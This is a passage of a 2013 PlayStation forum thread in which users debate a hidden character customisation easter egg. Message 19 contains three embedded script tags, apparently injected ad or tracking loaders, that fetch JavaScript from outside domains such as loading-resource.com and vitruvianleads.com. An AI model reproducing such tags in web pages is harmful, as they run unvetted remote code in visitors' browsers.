Reply
Lombax Warrior
Registered: 12/31/2012
Offline
157 posts
 

Re: Anyone Ever Notice???

Jan 2, 2013
Let me kno please
Message 11 of 24 (153 Views)
Reply
0 Likes
Wastelander
Registered: 07/14/2012
Offline
842 posts
 

Re: Anyone Ever Notice???

Jan 2, 2013
It's probably just changing the color of the character... I don't know why the OP is treating it as some big secret.
Message 12 of 24 (144 Views)
Reply
0 Likes
Treasure Hunter
Registered: 12/29/2011
Offline
7531 posts
 

Re: Anyone Ever Notice???

Jan 2, 2013

LilChockdog wrote:
Let me kno please

Check PM Smiley Tongue

Sleep Matt signature
Message 13 of 24 (143 Views)
Reply
0 Likes
Treasure Hunter
Registered: 12/29/2011
Offline
7531 posts
 

Re: Anyone Ever Notice???

Jan 2, 2013

Astroking112 wrote:
It's probably just changing the color of the character... I don't know why the OP is treating it as some big secret.

It is a secret as i bet you and a handful of others didn't know right?? the game been out 2 months and noone knew id say it is a secret

Sleep Matt signature
Message 14 of 24 (137 Views)
Reply
0 Likes
Treasure Hunter
Registered: 06/24/2011
Offline
4384 posts
 

Re: Anyone Ever Notice???

Jan 2, 2013

SteepMatt wrote:

Astroking112 wrote:
It's probably just changing the color of the character... I don't know why the OP is treating it as some big secret.

It is a secret as i bet you and a handful of others didn't know right?? the game been out 2 months and noone knew id say it is a secret


It's not threatening the game. Beside, the secret is already out. Lol. I'm pretty sure that the majority of higher-ups already know.

Ho Ho Ha Ha
Message 15 of 24 (126 Views)
Reply
0 Likes
Treasure Hunter
Registered: 12/29/2011
Offline
7531 posts
 

Re: Anyone Ever Notice???

Jan 2, 2013

FredFai wrote:

SteepMatt wrote:

Astroking112 wrote:
It's probably just changing the color of the character... I don't know why the OP is treating it as some big secret.

It is a secret as i bet you and a handful of others didn't know right?? the game been out 2 months and noone knew id say it is a secret


It's not threatening the game. Beside, the secret is already out. Lol. I'm pretty sure that the majority of higher-ups already know.


more of an easter egg.......and thanks for ruining the fun Smiley Sad

Sleep Matt signature
Message 16 of 24 (121 Views)
Reply
0 Likes
Treasure Hunter
Registered: 12/29/2011
Offline
7531 posts
 

Re: Anyone Ever Notice???

Jan 3, 2013

anyone else notice?? you can say it dont be shy Smiley Tongue

Sleep Matt signature
Message 17 of 24 (106 Views)
Reply
0 Likes
Fender Bender
Registered: 06/23/2007
Offline
2908 posts
 

Re: Anyone Ever Notice???

Jan 3, 2013

This was known before the game came out. It was shown in one of the videos. And his old hair doesn't really look good without the bald spot on top.

Message 18 of 24 (93 Views)
Reply
0 Likes
Gaming Beast
Registered: 11/22/2012
Offline
2167 posts
 

Re: Anyone Ever Notice???

Jan 3, 2013
Not to mention once you know it exists it takes 5 seconds to know how to do it.

The Fro never sleeps.png


 

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 19 of 24 (80 Views)
Reply
0 Likes
Treasure Hunter
Registered: 12/29/2011
Offline
7531 posts
 

Re: Anyone Ever Notice???

Jan 3, 2013

Fromundaman wrote:
Not to mention once you know it exists it takes 5 seconds to know how to do it.

That's the funny part lol

Sleep Matt signature
Message 20 of 24 (70 Views)
Reply
0 Likes